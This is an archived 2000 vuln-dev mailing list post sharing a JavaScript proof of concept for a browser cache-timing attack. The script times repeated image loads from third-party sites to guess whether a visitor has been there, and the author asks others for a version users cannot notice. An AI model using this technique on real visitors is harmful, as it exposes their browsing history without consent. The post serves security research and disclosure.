'cache cookie stuff'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       vuln-dev
Subject:    cache cookie stuff
From:       Henri Torgemane <henri_torgemane () YAHOO ! COM>
Date:       2000-12-14 3:13:54
[Download RAW message or body]

Hello,

I submitted this stuff on bugtraq yesterday, but it
doesn't look like it made it through. In fact, I
should probably have posted it here in the first
place.

Here's a try at implementing the privacy issue
described on the princeton PR that was mentioned on
bugtraq (url below). It does work, although it doesn't
seem overly bad.

If someone else can come with a way to achieve the
same result without the user being able to know about
it (in my implementation, anyone can view the source
to see something weird is happening), then it would
become a bit more serious.

Anyway, here goes.

Henri

<html>
<head>
<script>

/** quick attempt at implementing
http://www.princeton.edu/pr/news/00/q4/1205-browser.htm
 * This page loads an image present on another site
twice, then compare the loading times.
 * If the loading times are close enough, the image
was probably already in the cache
 *
 * This implementation "destroys" a "cache cookie"
each time it checks for it, as it will
 * place it in the cache not matter what. It is not
100% reliable, particularly if you're
 * using your bandwidth and/or your CPU to do
something else.
 *
 */

function timeme (url) {
  var img = new Image;
  var date = new Date;
  img.onload = function (){
    timeagain (url, new Date - date);
  }
  img.src = url;
}

function timeagain (url, score) {
  var img = new Image;
  var date = new Date;
  img.onload = function (){
    result (score - (new Date - date));
  }
  img.src = url;
}

function result (v) {
  document.f.t.value = (v<50?"":"not")+" visited. time
diff= "+v;
}
</script>
</head>
<body>
<form name=f>
<input type=button onclick="timeme
('http://www.securityfocus.com/images/frames/logo-top2.gif')"
value="securityfocus">
<input type=button onclick="timeme
('http://www.microsoft.com/library/homepage/images/ms-banner.gif')"
value="ms">
<input type=button onclick="timeme
('http://www.doubleclick.com/images/splash.main.gif')"
value="doubleclick">
<br>
<input type=text size=40 name=t>
</form>
</body>
</html>


__________________________________________________
Do You Yahoo!?
Yahoo! Shopping - Thousands of Stores. Millions of Products.
http://shopping.yahoo.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic